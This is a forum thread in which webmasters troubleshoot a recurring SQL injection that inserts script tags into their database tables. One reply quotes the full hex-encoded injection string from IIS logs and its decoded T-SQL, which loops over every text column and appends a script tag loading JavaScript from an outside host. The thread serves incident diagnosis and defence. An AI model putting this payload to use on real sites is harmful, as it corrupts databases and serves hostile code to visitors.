Link to home
Start Free TrialLog in
Avatar of vonfranzken
vonfranzken

asked on

banner82 sql injection

Can someone tell  me how to remove sql injections?
Is banner82 one?

see www.moviecues.com

click on search for sonts and watch
Avatar of chapmandew
chapmandew
Flag of United States of America image
NOt sure what you mean?  
Avatar of Guy Hengel [angelIII / a3]
Guy Hengel [angelIII / a3]
Flag of Luxembourg image
can you clarify?
ASKER CERTIFIED SOLUTION
Avatar of LoterX
LoterX
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of d0n7_5h007
d0n7_5h007
I'm experiancing this also, we clear the database of this text 6hours later the text appears again.
Avatar of chapmandew
chapmandew
Flag of United States of America image
Maybe there was some sort of job created on your server that is doing it.  Run profiler around when you think it will happen again to see where the statement is coming from.
Avatar of d0n7_5h007
d0n7_5h007
Ok our developement team have been looking into this, and discovered the cause of it. It looks like a security vulnerability covered in MS KB acticle 951306.

If any one experencing the problem can look through their IIS web access logs for...
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E65786539342E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

Some one has been running that along side one of our ASP pages
Translating the Hex string to Ascii results in the following...

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.exe94.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Resulting in text actually being imported to the tables...
Avatar of chapmandew
chapmandew
Flag of United States of America image
WEll that is sweet...was it SQL Injected?
Avatar of d0n7_5h007
d0n7_5h007
Yes it was. quite a few tables were affected

They had run the command after one of our search pages.

We're removing the injected strings (again) and will follow the guide lines of the KB acticle, hopefully we've solved this one.
Avatar of chapmandew
chapmandew
Flag of United States of America image
YOu can probably get around it by just using a stored proc instead of the inline code.